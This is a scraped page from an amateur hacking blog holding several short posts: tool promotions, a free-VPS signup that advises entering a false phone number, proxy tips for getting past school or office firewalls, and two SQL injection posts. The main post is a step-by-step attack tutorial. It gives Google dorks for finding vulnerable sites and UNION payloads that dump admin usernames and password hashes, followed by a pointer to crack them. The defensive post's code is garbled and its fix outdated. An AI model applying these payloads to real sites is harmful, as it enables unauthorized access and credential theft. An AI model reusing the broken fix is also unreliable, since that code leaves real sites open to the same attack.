Pages

SpyDLLRemover Tool

0 comments

This post about Spy DLL Remover.I am found this tool by my Security partner "SecurityXploded". This tool works very good,it remove all unwanted DLL from your system.



SpyDllRemover is the specialized tool for detecting spyware & hidden Rootkit in the System.It can also detect & remove user-land Rootkit processes as well as other spyware processes using multiple Rootkit detection algorithms coupled with in-house Process Heuristics.This makes it a generic tool for detecting & removing any known as well as unknown threats compared to traditional Antivirus Software which can detect only Know threats.

Though this tool is useful to novice users, it is mainly designed to help the analysts to uncover spyware elements which are missed by Antivirus softwares. So this tool can also be used along side the traditional Antivirus softwares to effectively detect & protect against known as well as unknown threats. In addition to this, to protect your computer from identity theft, learn identity theft facts at lifelock.com, they highly recommend having a strong firewall, and strong passwords to protect your computer from being hacked.


I am given you my personal view,i am very satisfied with this tool and given my thank to SecurityXploded for introduse me with this tool.

For Download Click Here


Hack Your Mozila Firefox and Open New Mozila Under Old

0 comments

Today,i am come in mode of fun so i am search internet and found a funny trick for Mozila Firefox browser. Every one know about Mozila and also use it very long time.Today post tell you how to do fun with Mozila Browser by funny hacking.




Here i am tell you how you open a new browser under old browser like given below picture...



For this a code which only enter in URL of browser and given Enter Key and you open new browser under old.

chrome://browser/content/browser.xul

It enter only on URL and enjoy this funny trick.


How to Make Your own VPS free free

11 comments

Today i am come with one more interesting Thread which about make your virtual machine of any Operating System and Application with out any Software and Virtual Machine Software and some good thing here it is totally free free.




Mission: Build a Windows 7 or any other farm in the cloud and collaborate with others to test, refine, and optimize the results.

Challenge: Quickly set up virtual environments in the cloud with secure access to applications, databases and files – while maintaining visibility and control of your environment and collaborating in real-time with team members and customers.

Solution: CloudShare ProPlus. It’s the ready-to-go cloud that lets you move enterprise applications to the cloud instantly and on demand - for development, testing, QA and migration. Plus it’s hassle free: no investment in servers or other hardware, no software licenses, no long application development cycles, no complex installations and no IT expertise of any kind required.

For this Click Here

When you click here you found a page like given below enter all blank space but remember you enter wrong Phone number and enter correct email address because for verification site send a link.


When you sign in account then your account look like below picture.Here click on 'create a new environment ' you see below....


It ask for verify,please verify it,after verification you see like below...


Here Choose you application according to your requirement. and click on 'Add this machine'.

After that you see new window like below click on 'Save and Continue to step 3'...



A processing start like given below picture...


When this process complete then you see a button 'view Machine' like above picture.

When you click it then a page open like given below...


Enjoy you free VPS.

It tutorial take mine 3 hour but a comment take only 1 minute,so please go down and enter your name and email id and submit your comment.

Socks 4/5 and HTTP Proxy

0 comments

Today post tell you how you online anonymity.For it we are use the online Socks and http server.

First thing here what is Socks?


Socks is a internet routed protocol that makes easier for packets to be routed between the client and server via proxy server.
Server is a structured as a set of processes and that offer services to the users,called clients.
Socks help users to connect with server so it is come under routed protocol according to Networking.
Socks protocol has a designated port,but it is not limited to that port,it port number is 1080.
Socks helpful get you by the network firewall,usually with schools or office,it open browsing for you.

Set your Socks and HTTP proxy:

For set proxy you need two thing...


2: List of online Socks and http Proxy with port number
For SOCKS proxy list go here

Start your Mozilla browser and Go to 'TOOL' click them and choose 'OPTION' a window open like below picture.
Where go to 'Advance' and then 'Network' and Click on 'Settings' all path shown below picture.



When you click on 'Settings' then new window open like given below...



Here go to 'Manual proxy configuration'.

Go to website which link given above and copy SOCKS Host name and port and ENTER in the Window shown location and then press OK button.

Your Proxy set on SOCKS4/5(According to your choice).

Enjoy it !

Plz given your comment easily by only enter your name and Email id and submit it because your response encourage me for future.

How To Stop SQL Injection On Your Website

1 comments

Website Hacking always hot topic between Hacker,some days before i am tell you how to hack a website by SQL Injection with picture.

For watch old Post Click Here



Today post about How to Safe your site against SQL Injection Attack because security of website too important for save your Data Base by access unauthorised person.

If your site SQL vulnerable then a hacker go to site login page and type tha administrator username and in the password field type or paste like this..

x' or '1'='1

If the site vulnerable then it login and you change all settings but how this code work.If you are able to log in then the code on side ...

$sql=
"SELECT*FROM users
"WHERE username="" . $username .
" AND password="" . $password ."";

then your code work as...

SELECT *FROM users WHERE username='admin' and PASSWORD='HrDe' or '1'='1

Here x' or '1'='1 has injected an extra phrase into the WHERE clause that means WHERE is always true,and this query will return a row contain the user's details.

If single user defined in the DB,then user's details will always returned else multiple users then one of those user will be returned at random.




How to safe website by Deface ?

How to fix vulnerable hole on your website,it's not difficult.Many ways to do it.If you work with MySQL then simply you fix it by using the
mysql_escape_string()
or
mysql_real_escape_string() function for example....

$userid=mysql_real_escape_string($userid);
$password=mysq;_real_escape_string($password);
$sql=
"SELECT*FROM users
"WHERE username="" . $username .
" AND password="" . $password ."";

This work as...

SELECT*FROM users WHERE username='admin' and PASSWORD='x\' or \'a\' =\'a

It backslashes(\) make the DB treat query like a normal character rather than as a delimiter,by it DB no interprets the SQL an OR in the WHERE clause.
This is one method but many ways open for you to protect yourself.

If this information helpful for you,so only enter your name and email id and write down your comment.
This is the small gift for my work by you.



Hackarde Come 1 More Step Near You

0 comments

Congrats! me and all viewer because your beloved blog "HACKARDE" come to near you 1 step more with Twitter.


Ya! it is right today "HACKARDE" start his Twitter Account because if you want like to near about "HACKARDE" so "HACKARDE" also like near about you.

All person know that today is the time of Social Networking and many people like to share our thing and work with other person,Twitter is a g8t place where you share your all passion.Many Companies CEO,biggest business man,Socialist,and Film Star follow twitter to connect with all person.

So i am thought why not "HACKARDE" share his view with his viewer,So the Result is Today "HACKARDE" launch his Twitter Account in Front of you.

My request to all viewer go to Twitter and Follow the "HACKARDE" for latest update.

For Follow "HACKARDE" Please click on the "FOLLOW ME ON TWITTER!" link which Shown in Blog at top right Side.


BruCON Agnitio workshop Slides and Video Demonstration - Download

0 comments

Workshop by David Rook at BruCON 2011 in Belgium. You can Download Slide from here.
Required for the Agnitio hands on demos:



Optional
In addition to the list above the following things are optional depending on how hands on you want to be:
  • Internet connection to download an application from the Android market place
  • Eclipse IDE installed
  • Android SDK installed
  • Android Debug Bridge (adb) installed, this should be installed as part of the SDK install
  • An AVD configured with the Android market place app installed (instructions here)
  • I think you can also use a rooted Android device if you don’t want to use the emulator
Workshop format
  • A quick look at static analysis and the strengths and weaknesses of humans and software
  • What is Agnitio and why do I think checklists are a vital component of security code reviews
  • Some examples of what can go wrong if you don’t use checklists to find and remove simple flaws
  • Demos/hands on: using checklists in Agnitio to review source code, produce reports and metrics
  • Demos/hands on: how to customise your Agnitio installation
  • A look at mobile (Android and iOS) application security and how analysis is currently done
  • Demo/hands on: using the mobile specific rule sets in the Agnitio static analysis module
  • Demo/hands on: downloading an app from the marketplace and decompiling it using Agnitio.

Source:TheHackerNews

Search Engine for PDF File

0 comments

Today i am going share with you a interesting site which help full for you and your work like making notes and project.

What is PDF search Engine?

"PDF books search engine" is a PDF finder, document search engine and text search engine on which you can find lots of PDF,ebooks,docs online and text documents.The results given by doc search engine is totally different from the normal search results that you can find on Google because it gives so many results at the same time ,So, may be you will get confused by looking that,that's why ebook search engine comes into picture,It searches the whole web for the PDF and gives back only PDF results.Let's take an example,suppose you are interested in getting PHP books online and you make a query like "php ebooks". It fetches the results from the web and gives you all pdf ebooks.

For going to Search Engine Please Click Here

Please do not forget given you good comment,only enter your name and Email id and submit your comment without log in.

Complete SQL Injection Attack Tutorial with Pics

31 comments

Hello Everyone today post too interesting because this post on Website Hack,this is very good and interesting line for all Hacker but newbie how to know about this,my post given you complete introduction on SQL Injection.



SQL (Structured Query Language)Injection is the first step of hacking any site.By use of SQL injection we hack any site which vulnerable.SQL Injection is a technique in which hacker insert a SQL code into web pages to get Information like User or Admin Name and Passwords of site for access the site and Deface it.
Before know about attack please clear your basic knowledge...

Data present in the column and many column present in tables and tables are part of Data Base.

Today many tools (Like Havij)are available for found a vulnerable site by this any newbie hack site easily but if you want make a original Hacker not Script Kid use some manual trick who help you hack any site and also increase your knowledge for future.

So if you are ready so let's start...

STEP 0: First find vulnerable site by use of this given Dorks...

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminhome.asp"
"inurl:newsdetail.php"
"inurl:shop.php"

You search Google Uncle for more Dork.


STEP 1: At first step we check a site vulnerable or not,here i am use some picture for help you to understand all step clear fully,i am access this site DB but not hack it because i am a Ethical Hacker and do everything only for knowledge and save other person by Black site Hacking.well come on our topic,here we test the this site vulnerable or not.For this i am add only ' in end of URL for example...
CODE:

http://www.sitename.com/newsdetail.php?id=10'

You see a error page like given below page,i am show error with red line,if you not find it go to other site and use same step.



STEP 2: After find vulnerable site i am going found number of columns in your site. Add only order by 1,2,.... and -- end of your Site URL like i am check column

http://www.sitename/newsdetail.php?id=10 order by 1-- >>>>page refresh
http://www.sitename/newsdetail.php?id=10 order by 2-- >>>>page refresh
http://www.sitename/newsdetail.php?id=10 order by 3-- >>>>page refresh
http://www.sitename/newsdetail.php?id=10 order by 4-- >>>>page given error

This mean in your site only 3 column.After it find accessible column for it write...

http://www.sitename.com/newsdetail.php?id=10 union all 1,2,3--

it shown you like below...


STEP 3: Here we find data base of vulnerable site....

http://www.sitename.com/newsdetail.php?id=10 union all 1,@@version,3--

It shown DB and his name like given below...




STEP 4: Here we find table name for it use this code...

http://www.sitename.com/newsdetail.php?id=10 union select 1,table_name,3 from information_schema.table--

This line shown you table name like given below...



STEP 5: Here i am going get the column name of site.For this we use this code...

http://www.sitename.com/newsdetail.php?id=10 union select 1,column_name,3 from information_schema.columns--

Which shown you all column like given below...


STEP 6: This is the last step where you try to get User or Admin name of site and his Password. For this we use this code...

http://www.sitename.com/newsdetail.php?id=-10 union select 1,concat(username,0x3a,password),3 from table

It given you user name and password like given below but this password encrypt in md5 so we use online tool for decrypt it.


For going on line tool click here

For write this post i am spend two days but you spend only 1 minute on given your good comment,your comment for me like prize and encourage me on future for write too good post for you.

*Purpose of this post only increase the knowledge of the viewer do not use it for any hacking activity because loss of other person is not good in eye of good.

Xcobra - Web Application Vulnerability Scanner

0 comments


Hello everyone,today is more boring for me because every lecture go down and my head in class up down.But when i am come in front of my computer all thing change in one minute,why?,i thing it is unnecessary tell to all computer lover.Well come on topic,here i am going to tell you a tool who helpful for you when you start check a vulnerable in any site for SQL,Cross Scripting and Blind SQL attack.
Xcobra is a tool who find Application Vulnerability by Scanning your enter site URL,Feature of tool given below...
*URL finder with adjustable deep
*Passive XSS scan
*Forms processing
*Simple SQL injection scan
*Blind SQL injection scan
*Plugins
*Report generators (Text, HTML, ...)
*CLI and GUI interfaces
*Cross-platform (Python + GTK)

For Download Click Here

How to use it?

First Install it and go to menu of Xcobra and enter your site URL which you want to scan for Vulnerability like given below picture...


Go to Scan settings shown in below picture and set your settings like given below...


Go to Plugin Pop up and check mark for all type of attack shown below...


Given your good comment.



Related Posts Plugin for WordPress, Blogger...

Hackarde's Search Engine- Search Hacking Tutorial,Tool and eBook

Loading
 
HACKARDE © 2011 | Designed by HrDe